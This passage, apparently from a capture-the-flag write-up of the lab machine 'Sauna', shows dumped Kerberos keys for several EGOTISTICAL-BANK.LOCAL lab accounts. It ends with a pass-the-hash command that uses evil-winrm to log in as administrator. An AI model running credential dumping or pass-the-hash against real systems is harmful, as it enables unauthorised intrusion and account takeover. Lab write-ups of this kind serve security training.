EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:19eae624d13150210b39f8ebd1fbc2e1d008c1482ceeac7bb70d07e498722fa5
SAUNA$:aes128-cts-hmac-sha1-96:727e2599324346f53b3dd866b8d42d55
SAUNA$:des-cbc-md5:0e62344a46d5a702Pass The Hash
evil-winrm -i 10.10.10.175 -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e'Last updated